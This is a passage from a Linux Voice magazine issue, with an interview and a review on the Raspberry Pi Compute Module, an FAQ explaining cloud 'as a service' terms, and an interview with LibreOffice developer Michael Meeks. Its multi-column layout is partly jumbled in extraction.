requires a little expertise to use, is also extremely
flexible and allows a user to leverage all of the
interfaces of the BCM2835 chip. In fact we kind of see
                                                                                                                                      More and more people are
the module a bit like a chip – you have to power it                   While we continue to keep our eye on what is out there
                                                                                                                                      building the Raspberry Pi
correctly and wire it up the way you want, but                        we don’t have any plans currently for a spec bump.              model A and B boards into
ultimately this makes it very flexible. Less is more!                                                                                 products, so the
                                                                            The Compute’s target markets are                          Foundation knew that
        Can you explain why you chose such a                                professional/commercial users. Do you have                there was demand for the
        radically different form factor for the                       any ideas for potential use cases?                              Compute Module.
Compute Module?                                                       JA: We can see so many use cases for the CM that it’s
JA: After we had decided that we wanted to create a                   hard to know where to begin. The Raspberry Pi (and
more embeddable Pi, it was really down to what the                    hence Compute Module) is a cheap and low-power
best connector solution and form factor for such a                    way to add network connectivity and compute and
device would be. The SODIMM form factor (and                          imaging horsepower to many types of product. Its
SODIMM connector) is a widely available and cheap                     Linux software stack is also actively developed and
way of providing the 200 pins of connectivity we                      now very stable. We expect to see a lot of ‘Internet Of
needed. It is also relatively small, robust, easy to use              Things’ type applications. The other thing the
and impossible to connect the wrong way around, so                    BCM2835 [the chip at the heart of the Pi] does
is fairly foolproof.                                                  extremely well is video encode/decode and 3D
                                                                      graphics. We see this being useful in digital signage
      The Compute Module came as quite a                              applications, video recording and imaging applications
      surprise to the community, with many                            and media players.
anticipating an increase in the Raspberry Pi
specs. Was this ever on the cards?                                           The Raspberry Pi Foundation’s focus has
JA: We see the current Raspberry Pi as a long-term                           always been on education, so how does the
product. Rather than chase the bleeding edge, we’re                   Compute Module fit into this?
trying to provide a mature and feature-rich hardware                  JA: The core focus of the Foundation is and always
platform and software stack at the $25 and $35 price                  will be educating kids in computing, and the revenue
points (and $30 for the CM). This means sticking with                 stream generated by the Compute Module goes
the current hardware and SoC [system on a chip].                      straight back into the Foundation to further these


  Potential use cases
  With new hardware comes lots of opportunities to hack and           Compute module could easily be used with a custom
  learn and the Compute Module is no exception. It has familiar       PCB to integrate with LCD and LED matrix displays, while
  hardware and software capabilities for Raspberry Pi-based           enabling access to the camera for openCV-powered facial
  hacking, so many of the tutorials and guides already available      recognition. Attach a 3G or Wi-Fi dongle to the board and you
  for the Raspberry Pi can be easily ported to work with it.          have an internet-enabled display.
     We asked a group of hackers and makers what they would              Linux Voice contributor Jon Archer (also of RossLUG)
  do with the new Compute module. Tim Gibbon, of RossLUG in           suggests: “Now you can have a server farm in the comfort of
  east Lancashire, suggested gigital signage: “We see digital         your own home, a custom PCB that can link many Compute
  signage in schools and shopping centres, and it is now so           Modules so that they can work together. The amount of space
  integrated into our lives that works of fiction such as the         and power taken by this setup would be negligible compared
  Minority Report are easily replicated using the Raspberry Pi. The   to a full server solution.”




                                                                        www.linuxvoice.com                                                                   35
     FEATURE RASPBERRY PI COMPUTE

                                                                                                    compute module and also as a platform for developers
                                                                                                    to prototype up system designs with before they go to
                                                                                                    the expense of creating a custom PCB for the
                                                                                                    Compute Module. It provides the minimum possible
                                                                                                    power chain, provides an easy way to program the
                                                                                                    eMMC and then breaks all other CM interfaces out to
                                                                                                    more friendly pin headers and FFC connectors.

                                                                                                           Do the extra GPIO pins on the IO board
                                                                                                           provide any extra features or special pins?
                                                                                                    JA: The GPIOs on the BCM2835 can be set to be
                                                                                                    either ‘straight’ GPIO – ie software-controlled inputs or
                                                                                                    outputs – or set to one of a number of other hardware
                                                                                                    interfaces such as I2C, SPI, UART, I2S etc. What you
                                                                                                    get with these extra pins is more options for both
                                                                                                    straight GPIO and the other interfaces.
                                                                                                       There are also a few more undocumented interfaces
                                                                                                    that will hopefully have some documentation released
                                                                                                    for them fairly soon. Two of these are parallel display
The CMIO board that
                                   aims. However we do understand the bigger picture,               (DPI) and Secondary Memory Interface (SMI). Neither
accompanies the Compute
Module provides a host of          what Pi has grown into and also that nurturing the               of these interfaces are available on the Pi as they are
extra connectivity options         community is very important to the success of the                wide interfaces – eg SMI uses 16 data pins and
over the standard Pi –             project. This community is not only providing the                several control signals, DPI 16–24 bit data and
including 120 GPIO pins.           required revenue stream for us to continue to meet our           strobes. Both interfaces are also very useful, and will
                                   charitable aims, but also feeding so much back. We               allow even more options for attaching different
                                   have so many volunteers doing everything from                    hardware to the CM once the relevant documentation
                                   writing/improving the software on the Pi to running              is released.
                                   Raspberry Jams and doing their bit to educate kids in
                                                                   computing. Back to the                 While it’s not a pin-compatible GPIO board
                                                                   CM then, we see this as                to the existing Pi, is it possible to connect a
“We see the Compute Module                                         filling an obvious market        board, for example Pibrella, PiBorg or others
as filling a market need and                                       need and providing us
                                                                   with valuable revenue. It
                                                                                                    using jumper cables?
                                                                                                    JA: Absolutely. The GPIO pins on the Raspberry Pi
providing us with revenue.”                                        will also provide positive       GPIO header are a subset of those available on the
                                                                   feedback into the Pi             BCM2835 (and therefore the CM and therefore CMIO
                                   ecosystem in terms of third-party CM boards, driver              headers). If you connect the right pins up with jumper
                                   software etc, so really it was a no-brainer for us and           wires theoretically it should just work. We aren’t really
                                   does fit in well with what we are trying to achieve.             expecting users to want to do this – if you want to use
                                                                                                    a Pibrella, why not just buy a Raspberry Pi? What we
                                         The Compute is only half of the package.                   expect is for users to add their own custom circuitry
                                         Can you tell us about the IO board into                    with just the features they need for their application to
                                   which the Compute is attached?                                   a CMIO board; test it, and once the design is proven,
                                   JA: The Compute Module IO Board (CMIO) is designed               spin their own custom PCB.
                                   to be both a reference design for how to wire up the
                                                                                                           The IO board does not have any Ethernet
                                                                                                           connectivity – why not?
  GPIO pins & connectivity                                                                          JA: The IO board is designed to break all of the CM
  The original Raspberry Pi has 26 GPIO pins      screens, such as the forthcoming                  interfaces out into a more prototype-friendly manner,
  at your disposal, but the Compute increases     Raspberry Pi Foundation screen.                   to provide power to the module and allow (re)
  the available pins to 120, of which 45 can be   The CAM connectors are for the official           programming the eMMC and be as simple as possible
  configured by the user. The remaining pins      Raspberry Pi camera, but you cannot use the
                                                                                                    in doing so. The Broadcom BCM2835 chip does not
  are a mix of exclusive pins for certain         official camera as is – if you already own a Pi
  devices (USB OTG, TVDAC, Camera etc) and        camera, you will need to purchase an adapter      have native Ethernet, so neither does the CM or the
  others are GND or 1v8 , 3v3 and 5v0. The        as the connector is a few mm smaller than         CMIO Board.
  increase in pins brings with it a much larger   that of the original Raspberry Pi. We spoke to       On the Raspberry Pi, Ethernet is provided by a USB
  scope for projects and experimentation.         CPC (one of the Raspberry Pi’s distributors)      to Ethernet + USB Hub bridge (LAN9512), which a user
     On either side of the HDMI port are two      about this adapter and it confirmed that it
                                                                                                    can add to their CM-based product if that is what they
  connectors: on the left of the HDMI they are    will be stocking the adapter and bundling it
  labelled DISP0 and DISP1; and to the right      with Pi Cameras purchased after the release       need. We are not trying to second guess what a user
  CAM0 and CAM1. DISP connectors are              of the Compute – do check to see if yours is      might want to plug in to their development platform
  reserved for connecting bespoke display         there if you buy one.                             here, just provide the basic interfaces and let the user
                                                                                                    add what they need for their application and no more.



36                                                                     www.linuxvoice.com
                                                                                        RASPBERRY PI COMPUTE FEATURE



Raspberry Pi Compute Module
The possibilities of a souped-up Raspberry Pi are mouthwatering – but is it right for
your project, or should you stick with the Model A or B? Les Pounder finds out.

T
         he Compute Module is a typical SODIMM-
         sized board that contains the Broadcom
         BCM2835 chip found on the original
Raspberry Pi, with a few notable extras to extend its
functionality – most notably 4GB of onboard eMMC
flash storage and a USB OTG port, which is the only
way of copying an operating system to the internal
storage. To mount the internal flash storage you’ll
need to download a special tool from the Raspberry Pi
website; installing this tool and mounting the eMMC is
automatic from this point on. Now that the Compute
is mounted on your computer, you can use dd to
transfer an image across from your Linux box.
   For this review we used the stock Raspbian image
as this is the most mature of the available distros
– please note that the NOOBS image is, at time of
writing, not really for use with the Compute. After the
Raspbian image was successfully installed on the            The Compute Module is pretty much the shrunken guts of a Model A Raspberry Pi,
Compute, we unplugged it from our test machine and          with some extras, and improved connectivity courtesy of the CMIO board.
set the kit up as per a normal Raspberry Pi installation.
   The Compute Module’s boot sequence is identical to       numbering is very clearly and logically laid out on the
a standard Raspberry Pi, except that the Compute is         board. The Compute is a mighty beast for GPIO-based
                                                                                                                           DATA
much faster, owing to the on-board eMMC being               projects and this is clearly its specialist area.              Web
directly available, rather booting from an SD card.           The Compute module is meant to be used with                  http://raspberrypi.org
                                                            expansion boards and PCBs created by the end user,             Developer
                                                                                                                           Raspberry Pi Foundation
Boundless possibilities                                     and the CMIO board from the Foundation is a means
                                                                                                                           Price
We started the LXDE desktop and ran the IDLE Python         to access the hardware locked inside the it. These             $200 - $250 for early
editor as root, then using the standard Rpi.GPIO            user-created boards are yet to see the light of day, but       developer kits. Price TBA
library for Python, were able to work with pins that        there are a few Kickstarter projects based around the          for individual units.
were not available on the Raspberry Pi. This is             specifications of the Compute module – for example
something really awesome: in total there are 120            the OTTO hackable camera www.kickstarter.com/
GPIO pins on the board, split into two banks of 60          projects/1598272670/meet-otto-the-hackable-gif-                CMIO CONNECTIONS
pins. From these 120 pins the user can adapt 45 pins        camera.
to meet the needs of their project. The remaining pins        The Compute and CMIO board provide a stable and              • 200 pin SODIMM
are reserved for power, 1V8, 3V3 and 5V and Ground          well supported platform for serious hardware                     connector for Compute
                                                                                                                             Module.
(GND). The use of I2C and SPI is also available via the     development. It is a more challenging platform to
                                                                                                                           • Micro USB power.
GPIO in the same manner as the standard Raspberry           work with, given the added complexity of flashing the          • Micro USB On The Go
Pi. The CMIO board uses the Broadcom pin                    on board eMMC flash storage as opposed to the more               (OTG) for connecting to
numbering sequence rather than the more common              common SD card method. Once this hurdle is                       a computer.
logical board reference, but the Broadcom pin               overcome, and it quickly will be, you are greeted with         • USB 2.0 port.
                                                                                                                           • HDMI output.
                                                            the familiar Raspberry Pi experience that we know
                                                                                                                           • 2 Official Raspberry Pi
                                                            and love. This board is for serious development and              Camera ports.
                                                            the early kits will be priced for serious development,         • 2 Official Raspberry Pi
                                                            with the Foundation aiming to mass produce the                   Display ports.
                                                            boards in greater numbers and drive the cost down as           • 120 GPIO pins, of which
                                                                                                                             45 can be used as
                                                            soon as possible.
                                                                                                                             inputs or outputs in
                                                                                                                             projects.
                                                              LINUX VOICE VERDICT                                          • GPIO support for I2C,
                                                                                                                             SPI, UART I2S.
                                                              A great product that will build on                           • Multiple GPIO pins for
                                                              the support and knowledge of the                               1v8, 3v3, 5v and GND.
                                                              existing Raspberry Pi community.
4GB may not seem like a lot of storage, but the Compute
Module is aimed at specialised embedded products.


                                                              www.linuxvoice.com                                                                       37
     FAQ [IPSM]AAS




             [IPSM]AAS
Something as a service? Surely the cloud is built on more than acronyms?
                                                        Linux Voice doesn’t usually         acronym. Cloud vendors are saying to
GRAHAM MORRISON                                         suffer from CTO babble. None        their customers, “Don’t worry about
                                                of what you said made any sense.            how all this works, just let us know what
        What does that silly title even                 Sorry about that! It’s because      you need and we’ll cover that as part of
        mean? [IPSM]AAS can’t                           these terms are bandied about in    our service.” And that’s where the other
seriously be a real name!                       keynotes and press releases, and may        parts of the acronym come together
        Ah no. We used an old grep trick        be responsible for giving the whole         – these are the parts that companies
        to group a load of characters           cloud revolution something of a bad         wanting the economies of scale found
together. It’s known as a bracket               name to us old-server types. But each       in the cloud can harness.
expression and it means that any                acronym – perhaps with the exception
search for [IPSM]AAS will return words          of MAAS, which is an invention of                   At last, it feels like we’re
that begin with any of the letters I, P, S or   Canonical’s – does represent a different            getting somewhere!
M and finish with the letters AAS. ‘AAS’        stratum of cloud provision. Does that               The best place to start is with
is an abbreviation of ‘as a service’, which     still sound evasive?                                ‘IaaS’, where the I is for
is as abstract a notion as the cloud                                                        ‘infrastructure’. Infrastructure can mean
itself, where all these acronyms live.                 Yes, actually. Why not just          the physical machines and the network
   The letters I, P, S and M stand for                 explain what one of these            that ties them together, along with the
infrastructure, platform, software and          acronyms actually means without             storage, the switches and the load
metal. They’re all related to cloud             saying ‘strata’?                            balancers required to run any kind of
provision and the scaling talk typical of              The cloud is this colossal network   networked service at scale. It’s the
when lots of servers become a cloud.                   of computing resources. It’s         closest level to the old server network
But don’t turn the page just yet. Linux is      different to old server networks only in    topology. But equally, IaaS includes
a fundamental part of this cloud, and it’s      its scale. When companies want to           virtual machines, virtual storage and
yet another area of incredible success          harness the power of the cloud, they        virtual local network devices rather than
and growth that would not have been             want to do so without worrying about        physical ones. The fact that customers
possible without Linux and Free                 the specifics of what those physical        won’t care which they’re getting is a
Software. It also happens to be where           servers actually are.                       vital clue to understanding why the
Canonical is focusing a lot of effort. At          We’re no longer dealing with the         cloud has become so important.
the beginning of June, Canonical                physical characteristics of a machine or       In the olden days, for example, you
reaffirmed Metal As A Service…                  its connection to the network – we’re       would pay for a server and you might
                                                dealing with computing, storage and         only use 20% of that server’s capacity
                                                net-bandwidth. For that reason, we          99.9% of the time. But sometimes, in
“IaaS includes virtual                          need another way to describe different
                                                levels of service provided by cloud
                                                                                            those remaining 8.76581277 hours,
                                                                                            perhaps thanks to an old-school
machines, virtual storage and                   infrastructure. We used the word            Slashdotting, your server is pushed past
virtual local network devices.”                 ‘service’ there, and that’s exactly how
                                                service is used within the ‘aaS’
                                                                                            its capabilities and stops responding.
                                                                                            IaaS fixes this by making resources



38                                                www.linuxvoice.com
                                                                                                                      [IPSM]AAS FAQ

‘elastic’, and as a result, you’re only    Twitter and millions of other angel-
charged for the resources you use –        invested hopefuls. The user has no
including CPU power, bandwidth and         knowledge of where these applications                    SaaS: Software as a Service
storage, rather than charging for          are running, or where the data is being            GMail, Google Docs, Facebook, Twitter, OwnCloud
resources you’re not using. It’s this      stored (or shared). They get unlimited
ability to charge incrementally that has   asynchronous access to their functions
                                                                                                     PaaS: Platform as a Service
led to the cloud becoming such a           from different devices and locations,
                                                                                              Web server, development environments, databases
success. Probably the best known IaaS      and while they are sometimes charged
is Amazon’s EC2, but there’s also          for the privilege, the prices reflect the
Google’s Compute Engine, Windows           scale of cloud provision rather than an                IaaS: Infrastructure as a Service
Azure and Rackspace’s Cloud.               app’s similarity to anything running on a        Real servers, virtual machines, storage, load balancers
                                           computer desktop. The ubiquity of
        What’s the difference between      associated web interfaces and APIs
        this and Platform as a service?    means they become their own
                                                                                                      MaaS: Metal as a Service
                                                                                             (from Canonical) add, remove and machine provision
        They are closely related, and      platforms, supported by third-party
        many of those providers we just    websites and mobile apps.
mentioned offer PaaS as part of their         For SaaS, the customer has become
products. The platform, as you may         the consumer, whereas in other levels,      A guide to recognising your AASes.
already have guessed, is effectively the   the customer is often the creator or the
operating system, but it should also       host for the content and we’ve left the                     hardware on which your stack resides.
include the environment that allows you    hardware and the physical                                   And hardware provisioning has become
to offer your service.                     infrastructure of these networks behind.                    core to Canonical’s cloud business. This
   For a website, that might just mean                                                                 June, MaaS become news again as
LAMP – Linux, Apache, MySQL/                      Which leaves us with the ‘M’                         part of Canonical’s push to embrace the
MariaDB and PHP. But PaaS is typically            – metal as a service.                                cloud. An essential part of Canonical’s
more ambitious than this. It could be a           While the other three levels have                    Orange Box announcement (a case
Python stack, or a web development                become part of the accepted                          containing 10 IvyBride micro-servers all
stack, or even team collaboration and      cloud lexicon, MaaS – Metal as a                            running OpenStack, and its JumpStart
storage. Or even Google’s own app          Service – is specific to Canonical and                      OpenStack training programme), MaaS
development engines. Additionally, PaaS    its ambitious plans to take over the                        is the glue that converts those
also includes the ability to remotely      cloud. MaaS is something that                               processors into applications. Combine
monitor and manage your applications,      Canonical has been working on for                           the hardware provision of MaaS with
all of which together is known rather      quite some time, and while not widely                       the apt-get functionality of Canonical’s
prosaically as the ‘solution stack.’ You   acknowledged, Ubuntu is one of the                          Juju, and anyone can spin up anything
should see where this is going.            most popular operating systems used                         from a development environment to a
                                           by cloud spinning wizards.                                  Steam gaming server.
       You mean with software as a            MaaS was first news in 2012, when
       service – sorry, Saas?              Canonical described it as the level                                All of this is beginning to make
       Exactly. SaaS is the natural next   beneath the infrastructure, which we                               sense. Is there any way of
       step up from the platform, where    imagine is where they get the ‘metal’                       playing with these ideas from the
the cloud providers fill in the gaps       part from. While not close enough to                        comfort of my own network?
themselves. Perhaps the best-known         the metal to see the heat sinks and the                            There are plenty of local IaaS
PaaS applications are Google’s email       ack LEDs, Mark Shuttleworth described                              alternatives, for example. You
and collaborative editing suites, Gmail    MaaS as “provisioning for the hyper                         could install OwnCloud on a NAS or a
and Google Docs, but there’s Facebook,     scale era”, making it easy to set up the                    server and enjoy many of the same
                                                                                                       benefits you get from Google Drive and
                                                                                                       Google Docs. You might even pay for a
                                                                                                       virtual machine somewhere, or a
                                                                                                       low-end-box for the IaaS part. There’s
                                                                                                       no obvious alternative to a social
                                                                                                       network but that’s because they’re very
                                                                                                       much a product of their platform.
                                                                                                       Canonical’s JuJu and its visualiser are a
                                                                                                       great way to see how packages are
                                                                                                       deployed across a network, and you can
                                                                                                       do this with a virtual machine. It’s even
                                                             Canonical’s Orange
                                                             Box is a datacentre for                   possible to run a single OpenStack node
                                                             £7,575, with many of                      from a virtual machine, so there’s plenty
                                                             the skills migrated to                    of potential if you want to teach yourself
                                                             the flick of a switch.                    about the cloud.



                                                           www.linuxvoice.com                                                                         39
     INTERVIEW MICHAEL MEEKS


“WE’VE HAD HUGE
COMMUNITY
SUPPORT. WE’RE
DOING GREAT
THINGS…”
We meet the LibreOffice developer to find out
what next for the suite, and what it’s like to start
a business supporting open source development.


A
        lmost three years ago,                 venture – focused purely on
        OpenOffice – one of the most           LibreOffice – is moving the office suite
        iconic pieces of open source           forward at a phenomenal pace, and
software – was forked and a new                working with the UK Cabinet Office to
office suite was born: LibreOffice.            ensure document freedom for the UK
  Michael Meeks was the driving force          government. Michael is also the most
behind the technical advancement of            enthusiastic person in free software,
the fledgling software, and oversaw            even when the subject is something
the project’s rebirth into a cutting-edge      seemingly mundane like bugfixing.
suite. This has led to LibreOffice               We caught up with him in
becoming standard on almost all                Collabora’s Cambridge office to find
Linux distros.                                 out about the future of LibreOffice, the
  In 2013 he started a new business,           crazy things people do with
Collabora Productivity, to support the         spreadsheets and why the GPU’s days
development of LibreOffice. This new           are numbered.



       What’s happened in the last             to see these things finally coming in…          You wouldn’t believe it, but in Spain,
       three years since LibreOffice           finally seeing the spreadsheet               for some reason, when they take legal
split from OpenOffice?                         performing, and having a reasonable          notes they’ve all got be in one
Michael Meeks: In three years, quite a         design internally. It’s an exciting time     paragraph. Previously you could only go
lot has happened. Initially we set up          with plenty of new stuff.                    two pages or so with one paragraph.
LibreOffice and we got a lot of people            The project is going really well. We      Now, the world is your oyster. You can
suddenly appearing and wanting to get          created a non-profit in Germany. We          go, really, a very long way. There are
involved, which was gratifying. And            took about $1m worth of donations and        some fixes like that that you can start to
that’s grown over time. We’ve now got          advisory board fees last year. We’ve had     see. German comments: we’ve come
[around] 100 people a month                    huge community support, and we’re            down from something like a hundred-
committing, and that’s trending                doing great things with that.                and-something thousand lines to
upwards. That’s individuals giving us                                                       something like 25, and we’re starting to
code. There’s a whole load more                      In every LibreOffice release           shrink that further.
translators and other people involved:               notes, there’s a comment                  We’ve been re-doing all the dialogs.
documentation, QA – there’s a huge             about cleaning up the internal code.         They used this horrible old way of
amount of work going on. We had about          How’s that going?                            creating dialogs, and now they use
3,000 commits last month, which is a           MM: Pft! Haha! There’s a huge amount         Glade, so they’re all easy to tweak and
pretty good ratio: 100 commits per day.        to do there. We’re doing pretty well. One    anyone can work on them – that’s now
And it’s cool. Lots of features, lots of       of the things you see in 4.2 for the first   85% complete. Hopefully by our next
fixing, lots of clean-up, lots of core work,   time complete is that we used to have        release, that will be done.
lots of features that people have really       four string classes and now we have             If you look at the Coverity stats
needed for a long time. For example,           two. So this means that in 4.2 we have       (Coverity does this static analysis and
comment printing went into 4.3. It’s nice      long paragraph support.                      checking of the code). There were



40                                                              www.linuxvoice.com
                                                                                       MICHAEL MEEKS INTERVIEW




                                                                               “Towards the end of this
                                                                               year you’ll see an Android
                                                                               viewer coming out, and
                                                                               probably an Adroid editor –
                                                                               we’re still looking into that.”


        10,000 or so of these potential issues,   can get documents from, and we’ve                   Looking forward over the next
        and again, we’ve fixed vast numbers of    ended up with something like 45,000                 few years, what are the big
        these and the number is going rapidly     problem documents that have been             things coming up for LibreOffice?
        down. The new build infrastructure is     nasty to deal with in the past, and then     MM: Towards the end of this year, you’ll
        now complete and that’s been there for    we run them through LibreOffice. We          see an Android viewer coming out, and
        two releases. But there’s still a huge    also compile with all of our debugging       probably an Android editor – we’re still
        amount of clean-up – these                assertions on, so we’re in paranoid          looking into that – but certainly a viewer.
        percentages hide problems – and of        mode, and we run this in a loop. It takes    You’ll see an iOS version before then.
        course when we do that, we create         a week or so each time.                      There’s a company working on that.
        more problems.                              That gives us a whole load of bugs,           In terms of online versions and
          Uncovering new bugs before the          which we’ve fixed, but from time to time     integrations with cloud-y things, those
        users see them is important. One thing    new ones come. We’re starting to             are probably further out, but it’s all a
        Marcus Mohrhard is doing is taking        export them to every format we               matter of money. These things aren’t
        every bug document we can find, so we     support, so not just loading 45,000          terribly expensive, but it’s finding people
        scrape our bugzilla, KDE’s, Gnome’s,      thousand documents, but re-exporting         to pay for them. What else? We’ve seen
        Free Desktop’s, you know, anywhere we     them as PDF, XLS, ODF, XLSX etc. That        OpenCL enablement of the Calc core –
                                                  takes longer, but also finds lots of         you can use the GPU to calculate
                                                  errors. We’re really starting to build the   spreadsheets, which is pretty exciting. If
“It’s a never-finished problem,                   infrastructure to tackle these things and
                                                  make that visible to people.
                                                                                               you look at the industry as a whole,
                                                                                               we’re moving to GPUs. Discrete GPUs
but we’re trying to make it a                        It’s a never-finished problem – that’s    will probably die.
little better everywhere.”                        the punchline – but we’re trying to
                                                  make it a little better everywhere.
                                                                                                  Previously, the GPU was stuck on a
                                                                                               card somewhere else, so if you wanted



                                                    www.linuxvoice.com                                                                41
     INTERVIEW MICHAEL MEEKS

                                                                                           clocked at gigahertz, and the GPU is
  LibreOffice is now part of the                                                           clocked much lower and it gives a much
  PCMark benchmarking suite                                                                wider power profile.
  – that’s a major win.                                                                        That’s GPGPU. There’s loads more we
                                                                                           can do there – faster JPEG loading,
                                                                                           faster rendering into the graphics
                                                                                           domain, GL stuff. It’s the future of
                                                                                           rendering. Even Microsoft is using it
                                                                                           now. The beauty of WebGL is that it
                                                                                           means you have to have GL everywhere,
                                                                                           so finally there’s grunt behind this
                                                                                           standard that means it’ll be ubiquitous.
                                                                                           It’s just a shame that there’s some
                                                                                           divisions in the GPGPU space: there’s
                                                                                           OpenCL, but there isn’t WebCL, there’s
                                                                                           Google’s thing which is a shame. GL
                                                                                           now works on Windows, Linux and Mac,
                                                                                           so it’s brilliant to have that rendering kit.
                                                                                               In LibreOffice on Windows, you have
to send a texture over to this and get it      them to the point that they’re too slow,    a scene that’s rendered in GDI (which is
back, you have to put it in a special bit of   and only then do they typically do          the native toolkit), and we want to
memory, and this is specially DMA’d            something about it.                         composite things on top of this. So you
over and you do something and it                                                           have the GDI rendering – which is
specially comes back later, and this is               But then they get OpenCL and         hardware accelerated anyway – going
lot of kernel transitions, round trips, pain          they can make them even more         into a texture, but you can’t get that
and aggravation. You have to copy              hideously complicated!                      texture to composite another GL thing
everything: put it in a physical bit of        MM: Yeah. Then they can do stupid           on top of it, so you end up with a square
memory somewhere that is in the DMA            stuff even more, and it actually make       window which is really horrible.
aperture. The next evolution is these          the thing glow. Even HR people, you’ll
Intel integrated graphics chips. They          see them doing vlookup()’s on salaries            What else is coming?
share the same memory, but again you           and trying to find out how many hours a           MM: Better integration, document
have to move it into an aperture.              week they spent in each area for each       management systems. There’s this
Because you’re talking physical memory         of these people in each day, and the        thing called LibreOffice Kit that we’re
not virtual, any pointer you have in this      days keep growing, and it’s building a      producing that enables you to reuse
space is meaningless to the graphics           huge table behind the scenes to say: bill   LibreOffice on the phones. They’re
chip. It will see it as a number, but it       this much for this month, etc.              better document indexing and
can’t see where this is in physical                                                        conversion in the background.
memory. Traditionally, they could only               How do you decide which of                  It sounds like you’re doing
map a small part of physical memory.                 these things are important?                 much more support than you
   HAS [Heterogeneous System                   MM: AMD came to us and encouraged           were five or six years ago.
Architecture] is a thing from AMD,             us to work on this. It makes sense,         MM: This is really a Collabora thing.
Imagination, ARM, etc. The basic idea is       because it’s power efficient – the CPU is   Collabora Productivity is really doing a
to give the GPU virtual memory address
space, so the GPU and the CPU are both
able to work on the same chunk of
memory, follow pointers, follow linked
lists, do stuff, and this means that you
can move work across to the GPU
much more easily: zero copy, not even
having to manipulate your structures, so
you can start to get the GPU to act on
something – like spreadsheets for
example – so you can get an advantage
with a very small amount of data.

     It’s surprising that people use
     spreadsheets to the extent that
                                                 Michael left SUSE in 2013, taking
they need GPU acceleration.
                                                 most of its LibreOffice developers
MM: It’s surprising what people do with
                                                 with him to start Collabora.
spreadsheets, and they typically extend



42                                                              www.linuxvoice.com
                                                                                                 MICHAEL MEEKS INTERVIEW

                                                           but there is Red Hat and Suse, and                    Is there anything you’ve
                                                           there’s a company called CloudOn                      learned from putting together
                                                           which is investing a lot of money.            pitches that could be learned by
                                                           There’s Igalia, which is a consultancy        other open source projects?
                                                           doing a whole load of stuff. Collabora of     MM: Let me give you the LibreOffice
                                                           course, Synerzip, Atomic, Ericsson –          pitch. “It’s easy for me to sit down and
                                                           lots of companies are starting to get         show our financial controller a feature
                                                           around this.                                  she doesn’t know in Excel or LibreOffice,
                                                                                                         and she works in it all day. There are
                                                                  Is that something that’s part of       features that could make her more
                                                                  LibreOffice, or something              productive, but since people don’t really
                                                           that’s come over from OpenOffice?             use most of the features, two questions:
                                                           MM: I think that’s part of LibreOffice. It    Why not? And why are we paying for
                                                           is a vendor-neutral space where               them? You can actually solve both of
                                                           everyone is equal and we want people          these in a single blow using LibreOffice.
                                                           to get involved. No one is privileged –       We’ll provide you with a subscription for
                                                           Collabora Productivity may employ the         about a twentieth of the cost of
                                                           largest group of the most skilled             Microsoft Office and secondly you can
                                                           developers (we have something like 12         use the money you’ve saved to train
 “We have to sell a lot, so I spend a
                                                           certified developers) and nine out of the     your staff who think they know how to
 lot of my time selling consultancy
 – but I love to code”.                                    20 top committers, but certainly not          use the software. You’re probably going
                                                           100%, and we’re eager for competitors         to have to do that anyway to move to
                                                           to come in. With my board hat on, I           LibreOffice. What you discover when
              lot of that, and we love people to use       spend time building business for our          you start training people is that they’re
              LibreOffice. If they can’t because there’s   competitors, so there’s no one who            like ‘wow, it can do that’, or ‘oh! It does
              no support, we’d love to support them. If    dominates it.                                 this’. Of course, there are some rough
              they can’t because it’s missing a feature,                                                 edges, but we can fix those. People can
              we can close that gap and off they run. I          Apache is still developing              become more productive, and save
              think we’re lubricating – getting                  OpenOffice. How do you see              money and move to LibreOffice so you
              LibreOffice into everywhere.                 that going?                                   win in every direction.”
                                                           MM: We’re diverging pretty rapidly. I            That’s the pitch. I think we can save
                    You’ve been involved in                think virtually everything I’ve told you is   people a significant amount of money,
                    LibreOffice and OpenOffice for         distinctive to LibreOffice thus far. We get   we can move them to open formats.
              a long time. Have you seen it                commits from them that we include             There are lots of reasons people want to
              become more popular in the                   where they’re suitable. Not every             do that, cost saving is one, but common
              commercial world?                            commit gets included. Two thirds do.          sense is better. There’s security – we
              MM: I think there are certainly areas           People feel that they own and are part     live in an era that’s very concerned
              where it’s very popular and it’s growing     of LibreOffice in a way that I never saw      about documents and leakage and so
              quite rapidly. I think a lot of people are   before with OpenOffice. It is something       on. In the UK, the cabinet office are
              using it without paying anything. If you     that people can be loyal to, passionate       doing a fantastic job at the moment.
              want to see a 150,000-seat deployment,       about and spend their evenings going          They’re doing a lot of good things
              you can go to Spain, and that’s great.       that bit extra. They’re unhappy when
              What we really want to make sure is          they get pulled off onto some other                  They certainly seem to say a
              that when people deploy it, they have        consulting project because they really               lot of good things…
                                                           want to make this absolutely beautiful        MM: I think those have an impact, but it
                                                           for the project. It’s a great feeling.        always takes time. We’ve been involved
“People feel that they are a                                       Do you spend most of your
                                                                                                         with the ODF consultation. If you want
                                                                                                         competition, and you want lots of
part of LibreOffice in a way                                       time now managing people and          implementations you can choose from,
that I never saw with OOo.”                                talking to the press?
                                                           MM: Gosh! I don’t talk to the press
                                                                                                         ODF is a great choice. To privilege the
                                                                                                         incumbent (with 90%+ market share) by
                                                           nearly enough! Almost no one knows            using a format they created as an exact
              services and support so that we can          about Collabora Productivity, which is a      cardboard cut out of their suite is a
              reinvest in making the product better.       shame, but there’s quite a lot to do.         really foolish way of encouraging
              We want to make a virtuous cycle so             I love to code – that’s the problem        competition. Lucky, the Cabinet Office
              that we can grow. Lots of business are       – but I have to sell, so I spend a lot of     has done the right thing and chosen
              doing that. If you look at the companies     my time building pitches, investigating       ODF, and they seem to be still going
              around the ecosystem, many years ago         what can be done, going to companies          through the process of making that
              it was Sun, Red Hat, Suse – that’s about     and saying “hey, would you like to invest     recommendation, but I think that’s a
              it. These days, there’s not Sun or Oracle,   in this”, and chasing that sort of thing.     sign of deep clue-fullness.



                                                             www.linuxvoice.com                                                                 43
                                                                                                                              INTRO REVIEWS




                                               REVIEWS
                                               The latest software and hardware for your Linux box, reviewed
                                               and rated by the most experienced writers in the business


                                                On test this issue...
                                                   46                                                         48



Andrew Gregory
Vodafone spying on us, eh? Mass-market open
hardware can’t come soon enough.




T
          he hardware acquisition
          department at LV Mansions is          XBMC vs MythTV                                              Mint 17
          at it again. I’ve put in a request    After a long day spent configuring KDE,                     Don’t pay for a Windows 8 licence until
for an old machine that a local business        Graham Morrison likes to watch telly.                       you’ve tried Linux Mint – now supported
is getting rid of. The price is £50 for the     But is it better on MythTV or XBMC?                         until 2019, as Mike Saunders discovers.
bare machine, or £60 with Windows
Vista. Naturally I’ve gone for the Vista                                                     50                              51
                                                    49
option – more on that in a bit.
    The thing is that these machines are
perfectly capable of running Windows 8
